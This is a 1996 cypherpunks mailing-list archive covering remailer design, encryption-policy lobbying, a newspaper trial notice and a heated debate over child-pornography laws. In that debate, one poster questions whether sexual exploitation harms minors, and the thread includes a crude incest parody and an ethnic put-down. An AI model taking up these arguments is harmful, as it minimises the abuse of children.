Every society has recognize that there were some basic rules it's citizens had to
live by inorder for them to survive. Now there can be some debate over individual
rules or how they should be inforced but all societies have agreed that there were
rules that the group as a whole had to live by.

The three major ones:

Don't Kill
Don't Steal
Don't Lie

A majority of our current laws come from these 3 basic principles.

Unfortunately our children are not being taught this. They are not being taught this
by their parents, they are not being taught this by the schools, and the majority of
airtime on TV is teaching them just the opposite.



- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - Warpserver SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->Get OS/2 - the best Windows tip around!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjbcBY9Co1n+aLhhAQGloAP/beWoYIMGwzbyerMdgobciQZW6o/zAnpI
dYUbWNY8pv40/YWWa4I0yHv31KVFySBAJZYb/WUmISQzwfXij4I+9GSmgYW2iri8
iIYl2RvCJsyBKz77Dgz1vKtAFOFOBNajcL9UqKKDOkwBtDu0PlHIOIoULn/ny8e3
cXIwTEt/Tbc=
=81z7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Thu, 12 Sep 1996 00:52:24 +0800
To: m5@tivoli.com
Subject: Re: Child Porn as Thoughtcrime
Message-ID: <199609111336.JAA92112@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: m5@tivoli.com, cypherpunks@toad.com
Date: Wed Sep 11 09:35:17 1996
Mike M Nally wrote:

> Declan McCullagh wrote:

<snip>

> > Under the Knox decision, yes. (Dancing girls in leotards are verboten.)
> 
> Is this going to have some implications for broadcast of the women's
> gymnastic events in the next Olympics?

Presumably, that depends on how/where/why the cameraman zooms in, if I am 
reading the case (and/or the judges' minds) right. [OK, I'll shut up now.]
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjbAG21lp8bpvW01AQEpKwP+NEJ3CQ3l1D1n4rwU6WZQuZlcEe0pUYJe
7qjyknU9sTrdkmfid7PYCAWYFbLYtmT7nBzPXG/6Cxjzq3Mti6OWzvJheE30qjaY
5zndbdm++E2t4WRCu6GLVDXjjXMk118/HqR0weaNURzhhxVCJkX8WfGjYIcruZhX
LguDNUs1//A=
=xD4K
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 04:50:40 +0800
To: Stephan Schmidt <cypherpunks@toad.com
Subject: Re: Digital rights organisation
Message-ID: <ae5c3a5501021004954e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:46 AM 9/11/96, Stephan Schmidt wrote:
>Hi,
>
>thinking about what happend in Germany,
>are there any 'digital rights' organisations
>in Germany ?
>
>If not, we would like to found one.
>Are there any international orgs (EFF?,...)
>who can help us ?

A wonderful idea, Stephan! You might try contacting EFF to see if a German
branch exists (though EFF is not a strongly member-oriented organization,
though people tell me this may be changing).

Germans should embrace the idea that the cure for bad speech is _more_
speech. Specifically, for the current German concerns, the "cure" for
speech by semi-Nazi skinheads and Holocaust deniers is free and open
speech. Hard to deny the Holocaust when web sites have thousands of
pictures, when archives exist.

(And when speech saying the Holocaust "never happened" is outlawed, a
certain fraction of the population thinks it's cool and chic to engage in
this speech! Human psychology and all. This is probably what 90% of the
skinheads are all about, plus some run of the mill hatred toward Turks and
other immigrants who they think are taking away their jobs....)

I understand that Germans have free speech in a lot of areas, and have less
censorship of sexual material than the U.S. has (television, especially).
But the areas where they _do_ censor, such as discussion of the Second
World War and related issues, are the ones the world see.

Germany needs to embrace completely free speech. This is the best way to
ensure that another dictator like Hitler does not get elected to power.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuck Thompson <chuck@nova1.net>
Date: Thu, 12 Sep 1996 03:44:15 +0800
To: tcmay@got.net
Subject: Child porn as thoughtcrime
Message-ID: <1.5.4.32.19960911145102.0069fb04@mail.nova-net.net>
MIME-Version: 1.0
Content-Type: text/plain


The answer to the all the questions in the first set is yes, in this country
anyway, if they are interpreted by the legal system as intending to incite
illicit sexual acts, fantasies or obsessions about children.  The fantasies
or obsessions are assumed to lead to the illegal acts.

>Whom is exploiting whom?  

Well, I'd say that anyone who benefits materially from the distribution of
child porn is exploiting either the children, the pervert or both.

>Which acts are crimes?

Most of them, in this country.  A few would be open to interpretation by the
courts.

>I submit that the various child porn laws we have in the United States are
about the >clearest examples of "thoughtcrime" one can find, where the
_thought_ is what is being >criminalized.

I agree that it is an excellent example for your proposition regarding
thoughtcrime.  I disagree that the thought is what is illegal, consequently
the subject doesn't work as the basis for your argument.  *Thinking* about
commiting a crime is not illegal, *acting* on your thought may be.  Exp:  I
can think/ponder about killing my enemy.  Until I do something about my
thoughts, I'm not guilty of a crime.  If I begin to discuss the commission
of a crime with you, and it could be proven that the discussion was actually
a part of the planning to commit such a crime, then, at the very least, we
are guilty of conspiracy to commit a crime.  Intent to commit an actual
crime must be proven.

>-- consumption of child porn creates a market
>-- it harms the children
>-- it's disgusting
>-- etc.
>Clearly the first argument applies to many other things.  Why not outlaw
pro-drug speech?

Hold on here..  you are making an invalid comparison.  To my knowledge,
there is no law against speaking in favor of child porn, any more than there
is against speaking in favor of drug usage.  It against the law to *use*
either of them.

>The second argument, that children are actually harmed, is vitiated by the
fact that >much so-called child porn comes from countries where the actors
are of legal age.
>How can a 14-year-old Thai girl be "harmed" when what she is bing paid to
do is 
>perfectly legal in Thailand?

There you go again..  being legal does not, in any way, mitigate it's
harmfulness.  There may be places on this earth where it is legal to
convince a two-year-old to perform some sexually gratifying act by giving
her a piece of candy.  Just because it is legal doesn't mean it won't scar
the child.  The effect on the child is what is illegal, in this case.

>And the case of morphings, drawings, stories, etc., clearly involve no
actual children, >so the argument that children are harmed is empty.

The argument is not dependent upon whether or not actual children are used,
any more than whether or not an actual gun is used in a robbery - the net
effect is the same.  Children are harmed by the promotion of child porn
because it leads to the abuse/exploitation of kids.


>As to me argument that images, stories, etc., are disgusting, amoral,
inappropriate, >etc., well, perhaps.  But what is the legal and
constitutional basis for restricting >such things?  Many opinions and
actions are vile and disgusting, but are not illegal.  >Under what
interpretation of the Constitution is the creation of a drawing depicting,
>say, a 7-year-old girl having sex with someone or something a criminal act?
The >obscenity laws?

First, you must separate opinions from actions.  In this country, opinions
are not ever illegal.  Some actions are.  The illegality is probably (I'm
out of my depth here, not being a lawyer or student of the constitution)
based on various laws which would fall under the umbrella of "obscenity".
We, as a society, have the right to formulate, pass and enact legislation
which we deem to be in our best interests.  And, as long as the laws which
are passed do not violate our constitution, the underlying basis for passing
such laws, the fact that an individual may not agree with the law does not
give that individual the right to violate it without consequence.  In other
words, an individual may be able to violate a law without consequence, if he
can prove that the law is unconstitutional.

>My point is this:  For anyone who claims that "thoughtcrime" is something
the Evil >Empire specialized in, i.e., totalitarian communist regimes, look
to the enforcement of >laws about what can be viewed or accessed from the
United States.  Thoughtcrime.

Your case is weak, because it is based on the false premise that the
illegality of child pornography equates to illegality of thought.  It is
overt action which is illegal, not thought.

Let those who believe that they have a constitutional right to "keep and
bear child pornography" violate the various laws and see if they can prove
that their constitutional rights are violated by the law which proscribes
such things.

By the way, Tim, I found your "translation" to be offensive, crude and
deliberately provocative.  I do, however, support your right to publish it.

Generally speaking, I find your missives to be enlightening and appreciate
the way they cause me to think carefully about my position on various topics.

Regards,

Chuck Thompson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 12 Sep 1996 04:25:50 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: One Time Reply Blocks (was Re: strengthening remailer protocols)
Message-ID: <199609111653.JAA03530@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:26 PM 9/10/96 -0700, Lance Cottrell wrote:
>It is a good idea, but it does involve another whole level of
>infrastructure. I am not at all sure that message pools are not a better
>system. Your suggestion requires The client to do a lot of work, and for
>the remailers to store many keys for indefinite periods.

You certainly know the details of Mixmaster remailers better than I do.  In
a last defense, while the protocol requires Alice's program to do a lot of
work, it still could be fairly easy for Alice herself to use.  In addition,
the remailer could set a definite limit to the lifetime of the keys, since
Alice is also setting such a limit.  If Alice specifies their lifetime when
she sends them, then the path would automatically dissolve without action
on her part.


Let me float one more hair-brained idea.  I think Tim May is right in
saying that the most secure response technique is the one in Blacknet. 
i.e. The response are posted to some public bulletin board, and then Alice
reads them at her leisure.

I see two problems with this approach:  (1) It doesn't scale well, and (2)
Alice's reading of the response may be detected.  (I think of the vans in
Great Britain which listen to the local oscillator frequency of TV sets to
find what people are watching.)

Perhaps both of these problems could be solved by something like a stock
photo service which uses digital watermarks to discourage copyright
infringement.  Since it is using digital watermarks, each copy of a
particular photo would be different, providing the opportunity to stego an
encrypted message in the photo.  If Alice regularly spent $.05 of Ecash for
a new desktop background photo, it would be hard to determine which had
stegoed messages.  The service might even make money on just the
above-board sales.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Wall Street Journal Interactive Edition             <wsj-announce@interactive.wsj.com>
Date: Thu, 12 Sep 1996 08:43:53 +0800
To: Multiple recipients of list WSJ-ANNOUNCE3             <WSJ-ANNOUNCE3@LISTSERV.DOWJONES.COM>
Subject: Important News from The Wall Street Journal Interactive Edition
Message-ID: <2.2.32.19960911141312.006aabc8@pop.dowjones.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Wall Street Journal reader:

Your trial subscription to The Wall Street Journal Interactive Edition ends
in less than two weeks, on Sept. 21, 1996.

We hope you've had the chance to explore the Interactive Edition fully
during this extensive trial period. If not, visit us today at http://wsj.com.
Be sure to check out key features such as Personal Journal, which enables you
to create a personalized view of current Journal news, and our extensive
Company Briefing Books. A brief tour of our most powerful features is at
http://wsj.com/tour.htm.

If you wish to continue with your subscription after the trial ends, you
don't need to re-register. Just fill out a brief online form and provide us
with payment information; we won't charge your credit card until after our
trial period is over. An annual subscription costs just $49 a year, or $29 a
year if you subscribe to any print edition of The Wall Street Journal.

To convert to an annual subscription, just access http://wsj.com and click
on the "Convert Now" graphic. If you do not wish to convert to an annual
subscription, you do not need to do anything -- you will not be billed and
your subscription will be canceled automatically at the end of the trial.

You may also be interested in a special offer available to users of
Microsoft's Internet Explorer. Microsoft has made arrangements with several
premier publishers on the Web, including the Interactive Edition, to offer
subscriptions to Internet Explorer users at no charge through the end of this
year. If you use the latest release of Internet Explorer as your Web browser,
you will be able to keep reading the Interactive Edition through Dec. 31,
1996 and there is no need for you to provide us with payment information at
this time. For more information on this offer, you can visit
http://wsj.com/ie.html or ask us questions at the e-mail address below.

We hope you'll stay with us as a charter annual subscriber. The coming
months will see continued progress and expansion on all fronts in the
Interactive Edition -- with more Briefing Books, an improved and enhanced
Personal Journal, more exclusive news coverage, a greatly expanded search
archive and a variety of new tools that we hope will make keeping track of
the news easier and more enjoyable.

If you have questions or comments, e-mail us at the address below or call
Customer Service at 1-800-369-2834 or 1-609-514-0870.

Neil Budde
Editor
The Wall Street Journal Interactive Edition
info@interactive.wsj.com

        --------------------------------------------------------
The WSJ-ANNOUNCE3 list is a service of The Wall Street Journal Interactive Edition
(http://wsj.com).

If you no longer wish to receive messages from the WSJ-ANNOUNCE3 list, simply
reply to
this message and in the body of your message type:

UNSUBSCRIBE WSJ-ANNOUNCE3





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Fabbro <afabbro@umich.edu>
Date: Thu, 12 Sep 1996 01:55:33 +0800
To: cypherpunks@toad.com
Subject: number theory paper resource
Message-ID: <Pine.SUN.3.95.960911102034.476D-100000@stimpy.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 10 Sep 1996, A L wrote:

>  I know most of the basics regarding RSA, PGP, and 
> assorted single pass (?) cyphers. One thing I do not 
> understand has to do with how RSA sieves large primes, 

As recently mention in sci.crypt...there's an interesting page with
papers on number theory & cryptology at:

	http://www.ph.tn.tudelft.nl/~visser

(~visser/crypto.html is the exact page you probably want)



 
Andrew Fabbro  [afabbro@umich.edu]  http://www-personal.umich.edu/~afabbro/
PGP mail preferred; finger afabbro@us.itd.umich.edu for key    
"A good marketing organization listens to its customers...WE HEAR YOU!"
		- the National Security Agency

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjbKlboWkgjb6N6dAQFBHAP/fO8gFhbAoQiB132Aan1ZR4X3hfcoyh3n
Io60fqD/5Ys1eGqaqUTxEjC1pZTzVOj5AxXYOBG7/vaqJ+FQelakW7Gs8eHTKqmA
3S4fQnISbUUrJWJf6OK7y7o+BupvZByOQ/wW4tE8xEFrSNYlKZVhFU+H/4+uOEUA
QNe8amszNGo=
=D6j6
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 05:17:34 +0800
To: cypherpunks@toad.com
Subject: Re: Child porn as thoughtcrime
Message-ID: <ae5c3da3020210045bef@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:51 PM 9/11/96, Chuck Thompson wrote:
>The answer to the all the questions in the first set is yes, in this country
>anyway, if they are interpreted by the legal system as intending to incite
>illicit sexual acts, fantasies or obsessions about children.  The fantasies
>or obsessions are assumed to lead to the illegal acts.

You later mention that "Intent to commit an actual crime must be proven."
Saying that fantasies or obsessions are assumed to lead to crimes is the
same as thoughtcrime.


>>Clearly the first argument applies to many other things.  Why not outlaw
>pro-drug speech?
>
>Hold on here..  you are making an invalid comparison.  To my knowledge,
>there is no law against speaking in favor of child porn, any more than there
>is against speaking in favor of drug usage.  It against the law to *use*
>either of them.

Writing a pro-drug article on the joys of marijuana use, on the pleasures
of opium, on the "naturalness" of various herbs, etc., would seem to me to
be essentially "drug pornography" (by the standards of porn laws). To use
your quote, "The fantasies or obsessions are assumed to lead to the illegal
acts."

(By the way, the language of pro-censorship anti-pornography crusaders is
being adopted by other special interest groups. Sarah Brady has called for
restrictions on what she calls "gun pornography," and there are a lot of
people trying to "clean up" television and movies by controlling "the
pornography of violence." By your various arguments that "fantasies and
obsessions" can lead to later crimes, are they not behaving as you would
wish them to? If thoughtcrime about how cool guns are can be eliminated, we
can save the children from gun violence!)

...

(my quote left in for context)

>>The second argument, that children are actually harmed, is vitiated by the
>fact that >much so-called child porn comes from countries where the actors
>are of legal age.
>>How can a 14-year-old Thai girl be "harmed" when what she is bing paid to
>do is
>>perfectly legal in Thailand?
>
>There you go again..  being legal does not, in any way, mitigate it's
>harmfulness.  There may be places on this earth where it is legal to

??? Are you saying that the legal system should punish people for perfectly
legal behavior which is "harmful" (putatively, in a future or "inspiration"
sense) to people?

(The civil litigation community is of course in agreement with you: Sue gun
manufacturers for crimes committed using their guns. Sue the makers of rock
climbing equipment for the harm done to rock climbers, even though
voluntary. Sue the horseback riding farms for falls suffered by riders. Sue
tobacco companies for the lung cancer of smokers. Sue MacDonald's for the
high cholesterol-induced heart attacks of customers. Sue the director of
"Natural Born Killers" on behalf of victims murdered in "copycat" cases.
Sue the author of "Lolita" for inspiring sex crimes. Sue.....)

>>And the case of morphings, drawings, stories, etc., clearly involve no
>actual children, >so the argument that children are harmed is empty.
>
>The argument is not dependent upon whether or not actual children are used,
>any more than whether or not an actual gun is used in a robbery - the net
>effect is the same.  Children are harmed by the promotion of child porn
>because it leads to the abuse/exploitation of kids.

You seem to be arguing for class-based rights and wrongs. Does promotion of
capitalism lead to the abuse and exploitation of workers? Perhaps we could
outlaw pro-capitalist writings.

Does pro-drug speech lead to drug abuse and misery? (Probably it does, of
course.) As I asked earlier, should pro-drug speech be outlawed? (You
earlier implied that of course it should not, that pro-drug speech is
protected. But if it probably leads to consumption of drugs, as nearly
everyone on both sides of the issue will likely agree, isn't it the same as
your point about child porn?)

....
>First, you must separate opinions from actions.  In this country, opinions
>are not ever illegal.  Some actions are.  The illegality is probably (I'm

Do you mean _unspoken opinions_? If so, I agree--after all, if never
spoken, the opinions are unknown to others, not even to Big Brother. If,
however, you mean that "_expressed_ opinions are not ever illegal," this is
clearly false. Sedition laws are still on the books, as are laws outlawing
the "advocacy" (an uttered opinion, surely) of various things.

(I believe it was Eugene Debs who spent time in prison for expressing the
opinion that the United States should not be in the Great War, or that the
draft should be abolished, or something related to this.)

>which we deem to be in our best interests.  And, as long as the laws which
>are passed do not violate our constitution, the underlying basis for passing
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Such as the "Congress shall make no law" language in the most important
items in the Bill of Rights? Just where in the Constitution is it said that
speech may be limited so as to reduce "fantasies and obsessions"? I read
the Constitution as saying this may not be done, and I read most later
Supreme Court interpretations as saying that limitations on speech may only
be implemented if there is a compelling need to protect other basic rights
(a la the infamous "falsely shouting "Fire!" in a crowded theater").

>Your case is weak, because it is based on the false premise that the
>illegality of child pornography equates to illegality of thought.  It is
>overt action which is illegal, not thought.

None of the acts I described in my piece involved _actions_ against
children in the United States. Drawing a picture or writing a story is
_speech_ (in the accepted definition of speech, thought, expression of
views, literature, etc.). Morphing an image of Raquel Welch is speech. And
so on.

This is not sophistry, this is a statement of what is really happening. No
actual child is involved. If one argues that speech which may lead to later
crimes, by other people, can and should be outlawed, then Pandora's Box is
truly opened for limiting vast amounts of speech. Words _do_ have impact,
tremendous impact in fact. Free speech _can_ and _does_ lead to others
committing crimes, killing themselves, acting stupidly, undermining
society, even having "fantasies and obsessions."

Get used to it.

>By the way, Tim, I found your "translation" to be offensive, crude and
>deliberately provocative.  I do, however, support your right to publish it.

What if it inspires a young girl to think more positively about having an
incestuous relationship with her father? Mightn't it inspire "fantasies and
obsessions"?

And under the CDA, it's probably illegal, given that various 13- and
14-year-olds are reading this list.

--Tim May


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 05:13:37 +0800
To: cypherpunks@toad.com
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illuminati
Message-ID: <ae5c476c03021004a87b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:43 PM 9/11/96, Dr.Dimitri Vulis KOTM wrote:
>tcmay@got.net (Timothy C. May) writes:

>> And who might these people be? I suggest you name them, as I have not even
>> mentioned your name to anyone. You don't rate a complaint from me.
>
>E.g. Kelly Goen is one of the people who told me that Tim May's been
>complaining about my alleged "spit" posts.

I've only spoken to Kelly Goen _once_ in many months, and he was calling
from his cellphone and we only talked for a few minutes. I don't recall
mentioning Vulis.

So, who are these "various people"?

>Note that Kelly's not on this mailing list (unlike at least two other
>people who said to me that Tim complained to them off-list) and that
>most of the posts Tim complains about are obvious forgeries.

Who are these "at least two other people"?

I _do_ think you're a loon. Not in the endearing sense of some net.loons,
but in the peculiar kind of foaming-at-the-mouth lunacy that I've seen in
several Russian and Armenian emigres.

--TCM

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 12 Sep 1996 09:12:28 +0800
To: Voters Telecommunications Watch <cypherpunks@toad.com
Subject: ALERT: Call the Commerce committee!  1-800-962-3524
Message-ID: <199609111741.KAA18899@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


checking my files and verifying the number this morning, I find that there 
is an active 1-800 number to call Congress.  (Don't know who'se it is, but 
it reaches the Congressional switchboard...)

The Capitol Switchboard can be reached at 1-800-962-3524.



At 12:42 AM 9/11/96 -0400, Voters Telecommunications Watch wrote:
>========================================================================
>
>           SENATE COMMERCE COMMITTEE VOTE TOMORROW IN QUESTION
>       	     WHITE HOUSE STALLING; THE NET CAN SAVE THE VOTE
>
>		OFFICES ARE RECEIVING 'LOTS OF CALLS'
>                MAKE A CALL TO THE COMMERCE COMMITTEE 
>
>	               	 September 11, 1996
>
>      Please widely redistribute this document with this banner intact
>			until September 30, 1996
>
>________________________________________________________________________
>CONTENTS
>	The Latest News
>	What You Can Do Now
>	Background / What To Expect This Week
>	Description of S.1726, Pro-CODE Bill
>	Chronology of Pro-Crypto Legislation
>	For More Information / Supporting Organizations
>
>________________________________________________________________________
>THE LATEST NEWS
>
>Sometimes things work out better than imagined.  This was the feeling
>tonight as I waded through my email from people all over the country that
>called the commerce committee.  This was the feeling as I heard from visitors
>to one Senator's office who, while waiting for a few minutes in the lobby,
>listened to the receptionist take two quick calls from netizens calling
>about the bill.
>
>Receptionist, cutting the caller off: "S.1726?  Yes, I'll pass that along
>to the Senator, thanks.  We've been getting a lot of calls."
>
>Another netizen emailed us saying that he also called his Representative.
>It turns out this Rep. has some friends who have co-sponsored HR 3011, the
>House version of Pro-CODE.  The calls and elevated publicity from this phone
>campaign have convinced him to consider co-sponsoring HR 3011.
>
>This is great, but our success has mobilized the anti-crypto forces
>into action as well.  The Clinton Administration, who has long opposed
>the right of citizens to use non-Clipper encryption, has begun working
>behind the scenes to make sure that the vote on Pro-CODE (S.1726) never
>happens.
>
>To have the Senate Commerce committee go on record that encryption exports
>should be loosened, against the will of the Administration, would be
>an embarrassment to the White House.  They have begun pushing hard to
>pressure Democratic Commerce Committee members to put the brakes on the
>bill, and do everything they can to prevent the vote this Thursday.
>
>To see the business community, the industry, and the public line up the
>Administration would be extremely hard to take and still seem
>credible.
>
>It's crucial that we continue to make noise and ring those phones.  By
>pulling enough favors with members of the Senate Commerce Committee, it's
>possible that the White House could prevent this vote from happening.
>
>WE MUST NOT LET THAT HAPPEN.  Appropriately forward this to everyone you
>know until the expiration listed above.  Go to work, bug your neighbor
>in the cubicle or office next to you.  Have they called yet?  Bug them
>until they do.  Call the rest of the members you haven't gotten around to
>yet.
>
>And don't forget to sign the petition at http://www.crypto.com/petition/ !
>
>[Rest of alert is the same from last time]
>________________________________________________________________________
>WHAT YOU CAN DO NOW
>
>It's crucial that you call the Commerce committee members below and
>urge them to pass S.1726 out of committee without amendments.  (This is
>also known as a "clean" bill.)  Any opportunity for amendments (even if
>they are good) opens us up to the possibility of hostile amendments
>that could restrict the use of encryption even further than today's
>abysmal state.  It could even prohibit the use of encryption without
>Clipper Chip-like key 'escrow' technology, which includes built-in
>surveillance and monitoring functionality.
>
>1. Call/Fax the members of the Senate Commerce committee and urge
>   them to pass S.1726 out of committee "cleanly".  Do not use email,
>   as it is not likely to be looked at in time to make a difference
>   for the markup on September 12th.
>
>   Use the sample communique and directory listing below to make it a
>   simple TWO MINUTE task.
>
>2. Sign the petition to support strong encryption at
>   http://www.crypto.com/petition/   !  Join other cyber-heroes as
>   Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and
>   others who have also signed.
>
>3. Between now and Wed. September 12, it is crucial that you call all
>   these members of Congress.
>
>      P ST Name and Address           Phone           Fax
>      = == ========================   ==============  ==============
>      D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
>      D MA Kerry, John F.             1-202-224-2742  1-202-224-8525
>      D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
>      D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
>      D WV Rockefeller, John D.       1-202-224-6472  1-202-224-7665
>      D LA Breaux, John B.            1-202-224-4623  1-202-228-2577
>      D NV Bryan, Richard H.          1-202-224-6244  1-202-224-1867
>      D ND Dorgan, Byron L.           1-202-224-2551  1-202-224-1193
>      D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
>      D OR Wyden, Ron*                1-202-224-5244  1-202-228-2717
>
>      R SD Pressler, Larry*           1-202-224-5842  1-202-224-1259
>      R MT Burns, Conrad R.(*sponsor) 1-202-224-2644  1-202-224-8594
>      R AK Stevens, Ted               1-202-224-3004  1-202-224-2354
>      R AZ McCain, John               1-202-224-2235  1-202-228-2862
>      R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
>      R MS Lott, Trent*               1-202-224-6253  1-202-224-2262
>      R TX Hutchison, Kay Bailey      1-202-224-5922  1-202-224-0776
>      R ME Snowe, Olympia             1-202-224-5344  1-202-224-1946
>      R MO Ashcroft, John*            1-202-224-6154  1-202-228-0998
>      R TN Frist, Bill                1-202-224-3344  1-202-228-1264
>      R MI Abraham, Spencer           1-202-224-4822  1-202-224-8834
>
>	* supporter or cosponsor.  The bill also enjoys broad bi-partisan
>	support from members not on the committee including Senators Leahy
>	(D-VT) and Murray (D-WA).
>
>4. Here is a sample conversation:
>
>   SAMPLE PHONE CALL
>	You:<ring ring>
>	Sen:Hello, Senator Mojo's office!
>
>	You:
>
>SAY     I'm calling to urge the Senator to pass S.1726, the 
>THIS-> 	Burns/Leahy/Pressler bill, S.1726 when the committee votes on
>	it on Thursday.  It's critical to the future of privacy, security,
>	and electronic commerce on the internet.
>
>	Sen:Ok, thanks!<click>
>
>   IF THEY SAY
>	"The Senator has concerns about the bill",
>   please answer,
>   	"Please try to work these issues out as it moves to the Senate floor,
>	 but passage out of committee will send an important signal to
>	 the Administration."
>
>5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM
>   YOU.  Please tell us who you called, and how they sounded.  We'll be
>   passing this information to folks in D.C. who can help apply pressure
>   where needed.
>
> 	$ Mail vtw@vtw.org
>	Subject: I called so-and-so
>
>	Hey, I called Sen. Mojo.  He sounded iffy, call in the
>	reinforcements.
>	^D
>
>6. Forward this to your friends and colleagues in appropriate forums
>   until the date of expiration at the top.  Forward a copy of this to
>   your Internet Service Provider as well, and ask them to put the following
>   text in their message of the day (motd), or on their WWW page:
>
>	ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
>
>	The U.S. Senate will be voting on a proposal to encourage
>	better security on the Internet on Thu Sep. 12th.  Your help is
>	needed to call Congress.  See http://www.crypto.com/ for more
>	details.
>
>	ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
>
>________________________________________________________________________
>BACKGROUND / WHAT TO EXPECT THIS WEEK
>
>For the past 3 years, Cyber-Rights Activists, citizens, and industry
>leaders have been working hard to reform US encryption policy.
>
>Support has been building behind several legislative proposals this
>year because they send a clear signal to the Administration about the
>need for security and privacy in the Information Age.  The digital
>revolution is currently being held hostage by the White House's Cold
>War restrictions on privacy-enhancing encryption technology.
>
>Now, with Congress less than a month away from adjournment, everyone
>who supports encryption and privacy is working to see this bill leave
>committee in order to send a clear message to the White House that they
>are on the wrong side of the encryption issue.  Although this bill may
>not become law this year, its passage out of committee will be a
>landmark event that will clearly tell the White House that the
>Congress, the public, and the computer industry care about security and
>privacy, and need strong, reliable encryption technology in order to
>make the Internet a viable platform for commerce, education, and
>democracy.
>
>Success for our side is not certain, and the next week is not without risks.
>On September 12th, the Senate Commerce committee will hold a "markup",
>where the bill is examined, voted on, and if there are enough votes,
>passed out of committee.  Two things could happen:
>
>	-the committee could pass the bill as written,
>	-the committee could pass the bill with amendments.
>
>Any amendments are not likely to be friendly, and in particular, quiet
>sources have told privacy activists that the Clinton Administration has been
>readying a legislative assault on your right to use encryption for several
>weeks now.  A Clipper-like amendment could be attached to the bill if
